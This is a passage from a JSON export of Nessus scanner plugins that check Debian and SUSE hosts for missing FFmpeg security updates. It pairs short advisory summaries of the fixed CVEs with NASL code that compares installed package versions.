(!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"ffmpeg\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ffmpeg-doc\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavcodec-dev\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavcodec-extra\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavcodec-extra58\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavcodec58\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavdevice-dev\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavdevice58\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavfilter-dev\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavfilter-extra\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavfilter-extra7\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavfilter7\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavformat-dev\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavformat58\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavresample-dev\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavresample4\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavutil-dev\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavutil56\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libpostproc-dev\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libpostproc55\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libswresample-dev\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libswresample3\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libswscale-dev\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libswscale5\", reference:\"7:4.1.6-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T00:10:19", "description": "Several vulnerabilities have been fixed by upgrading FFmpeg, a widely used multimedia framework, from 3.2.14 to 3.2.15.\n\nCVE-2019-13390\n\nrawenc: Only accept the appropriate stream type for raw muxers.\n\nCVE-2019-17542\n\nHeap-based buffer overflow in vqa_decode_chunk.\n\nCVE-2020-13904\n\nUse-after-free via a crafted EXTINF duration in an m3u8 file.\n\nFor Debian 9 stretch, these problems have been fixed in version 7:3.2.15-0+deb9u1.\n\nSeveral other bugs are also fixed in 3.2.15, a full list of changes is available at https://git.ffmpeg.org/gitweb/ffmpeg.git/blob/37a8ad9a3167923d50091003 1a8086489c004d83:/Changelog\n\nWe recommend that you upgrade your ffmpeg packages.\n\nFor the detailed security status of ffmpeg please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/ffmpeg\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-28T00:00:00", "type": "nessus", "title": "Debian DLA-2291-1 : ffmpeg security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-13390", "CVE-2019-17542", "CVE-2020-13904"], "modified": "2020-07-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ffmpeg", "p-cpe:/a:debian:debian_linux:ffmpeg-doc", "p-cpe:/a:debian:debian_linux:libav-tools", "p-cpe:/a:debian:debian_linux:libavcodec-dev", "p-cpe:/a:debian:debian_linux:libavcodec-extra", "p-cpe:/a:debian:debian_linux:libavcodec-extra57", "p-cpe:/a:debian:debian_linux:libavcodec57", "p-cpe:/a:debian:debian_linux:libavdevice-dev", "p-cpe:/a:debian:debian_linux:libavdevice57", "p-cpe:/a:debian:debian_linux:libavfilter-dev", "p-cpe:/a:debian:debian_linux:libavfilter-extra", "p-cpe:/a:debian:debian_linux:libavfilter-extra6", "p-cpe:/a:debian:debian_linux:libavfilter6", "p-cpe:/a:debian:debian_linux:libavformat-dev", "p-cpe:/a:debian:debian_linux:libavformat57", "p-cpe:/a:debian:debian_linux:libavresample-dev", "p-cpe:/a:debian:debian_linux:libavresample3", "p-cpe:/a:debian:debian_linux:libavutil-dev", "p-cpe:/a:debian:debian_linux:libavutil55", "p-cpe:/a:debian:debian_linux:libpostproc-dev", "p-cpe:/a:debian:debian_linux:libpostproc54", "p-cpe:/a:debian:debian_linux:libswresample-dev", "p-cpe:/a:debian:debian_linux:libswresample2", "p-cpe:/a:debian:debian_linux:libswscale-dev", "p-cpe:/a:debian:debian_linux:libswscale4", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2291.NASL", "href": "https://www.tenable.com/plugins/nessus/139008", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2291-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(139008);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/30\");\n\n script_cve_id(\"CVE-2019-13390\", \"CVE-2019-17542\", \"CVE-2020-13904\");\n\n script_name(english:\"Debian DLA-2291-1 : ffmpeg security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been fixed by upgrading FFmpeg, a widely\nused multimedia framework, from 3.2.14 to 3.2.15.\n\nCVE-2019-13390\n\nrawenc: Only accept the appropriate stream type for raw muxers.\n\nCVE-2019-17542\n\nHeap-based buffer overflow in vqa_decode_chunk.\n\nCVE-2020-13904\n\nUse-after-free via a crafted EXTINF duration in an m3u8 file.\n\nFor Debian 9 stretch, these problems have been fixed in version\n7:3.2.15-0+deb9u1.\n\nSeveral other bugs are also fixed in 3.2.15, a full list of changes is\navailable at\nhttps://git.ffmpeg.org/gitweb/ffmpeg.git/blob/37a8ad9a3167923d50091003\n1a8086489c004d83:/Changelog\n\nWe recommend that you upgrade your ffmpeg packages.\n\nFor the detailed security status of ffmpeg please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/ffmpeg\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n # https://git.ffmpeg.org/gitweb/ffmpeg.git/blob/37a8ad9a3167923d500910031a8086489c004d83:/Changelog\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4441a2ab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/07/msg00022.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/ffmpeg\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/ffmpeg\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ffmpeg-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-extra57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavdevice-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavdevice57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter-extra6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavformat-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavformat57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavresample-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavresample3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavutil-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavutil55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libpostproc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libpostproc54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswresample-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswresample2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswscale-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswscale4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"ffmpeg\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ffmpeg-doc\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libav-tools\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavcodec-dev\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavcodec-extra\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavcodec-extra57\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavcodec57\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavdevice-dev\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavdevice57\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavfilter-dev\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavfilter-extra\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavfilter-extra6\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavfilter6\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavformat-dev\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavformat57\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavresample-dev\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavresample3\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavutil-dev\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavutil55\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libpostproc-dev\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libpostproc54\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libswresample-dev\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libswresample2\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libswscale-dev\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libswscale4\", reference:\"7:3.2.15-0+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-19T13:14:42", "description": "This update for ffmpeg fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-17542: Fixed a heap-buffer overflow in vqa_decode_chunk due to an out-of-array access (bsc#1154064).\n\nCVE-2019-12730: Fixed an uninitialized use of variables due to an improper check (bsc#1137526).\n\nCVE-2019-9718: Fixed a denial of service in the subtitle decode (bsc#1129715).\n\nCVE-2018-13301: Fixed a denial of service while converting a crafted AVI file to MPEG4 (bsc#1100352).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-12-06T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : ffmpeg (SUSE-SU-2019:3184-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-13301", "CVE-2019-12730", "CVE-2019-17542", "CVE-2019-9718"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:ffmpeg", "p-cpe:/a:novell:suse_linux:ffmpeg-debuginfo", "p-cpe:/a:novell:suse_linux:ffmpeg-debugsource", "p-cpe:/a:novell:suse_linux:ffmpeg-private-devel", "p-cpe:/a:novell:suse_linux:libavcodec57", "p-cpe:/a:novell:suse_linux:libavcodec57-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libavcodec57-debuginfo", "p-cpe:/a:novell:suse_linux:libavdevice-devel", "p-cpe:/a:novell:suse_linux:libavdevice57", "p-cpe:/a:novell:suse_linux:libavdevice57-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libavdevice57-debuginfo", "p-cpe:/a:novell:suse_linux:libavfilter-devel", "p-cpe:/a:novell:suse_linux:libavfilter6", "p-cpe:/a:novell:suse_linux:libavfilter6-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libavfilter6-debuginfo", "p-cpe:/a:novell:suse_linux:libavformat57", "p-cpe:/a:novell:suse_linux:libavformat57-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libavresample3", "p-cpe:/a:novell:suse_linux:libavresample3-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libavutil-devel", "p-cpe:/a:novell:suse_linux:libavutil55", "p-cpe:/a:novell:suse_linux:libavutil55-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libavutil55-debuginfo", "p-cpe:/a:novell:suse_linux:libpostproc-devel", "p-cpe:/a:novell:suse_linux:libpostproc54", "p-cpe:/a:novell:suse_linux:libpostproc54-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libpostproc54-debuginfo", "p-cpe:/a:novell:suse_linux:libswresample-devel", "p-cpe:/a:novell:suse_linux:libswresample2", "p-cpe:/a:novell:suse_linux:libswresample2-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libswresample2-debuginfo", "p-cpe:/a:novell:suse_linux:libswscale-devel", "p-cpe:/a:novell:suse_linux:libswscale4", "p-cpe:/a:novell:suse_linux:libswscale4-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libswscale4-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2019-3184-1.NASL", "href": "https://www.tenable.com/plugins/nessus/131756", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:3184-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(131756);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-13301\", \"CVE-2019-12730\", \"CVE-2019-17542\", \"CVE-2019-9718\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : ffmpeg (SUSE-SU-2019:3184-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for ffmpeg fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-17542: Fixed a heap-buffer overflow in vqa_decode_chunk due\nto an out-of-array access (bsc#1154064).\n\nCVE-2019-12730: Fixed an uninitialized use of variables due to an\nimproper check (bsc#1137526).\n\nCVE-2019-9718: Fixed a denial of service in the subtitle decode\n(bsc#1129715).\n\nCVE-2018-13301: Fixed a denial of service while converting a crafted\nAVI file to MPEG4 (bsc#1100352).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1100352\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1129715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1137526\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1154064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-13301/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-12730/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-17542/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-9718/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20193184-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?43c72c88\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 15-SP1:zypper in -t patch\nSUSE-SLE-Product-WE-15-SP1-2019-3184=1\n\nSUSE Linux Enterprise Workstation Extension 15:zypper in -t patch\nSUSE-SLE-Product-WE-15-2019-3184=1\n\nSUSE Linux Enterprise Module for Packagehub Subpackages 15:zypper in\n-t patch SUSE-SLE-Module-Packagehub-Subpackages-15-2019-3184=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15-SP1:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-SP1-2019-3184=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-3184=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15-SP1:zypper in\n-t patch SUSE-SLE-Module-Desktop-Applications-15-SP1-2019-3184=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2019-3184=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ffmpeg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ffmpeg-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ffmpeg-private-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavcodec57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavcodec57-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavcodec57-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavdevice-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavdevice57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavdevice57-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavdevice57-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavfilter-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavfilter6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavfilter6-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavfilter6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavformat57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavformat57-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavresample3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavresample3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavutil-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavutil55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavutil55-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavutil55-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpostproc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpostproc54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpostproc54-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpostproc54-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libswresample-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libswresample2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libswresample2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libswresample2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libswscale-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libswscale4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libswscale4-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libswscale4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver 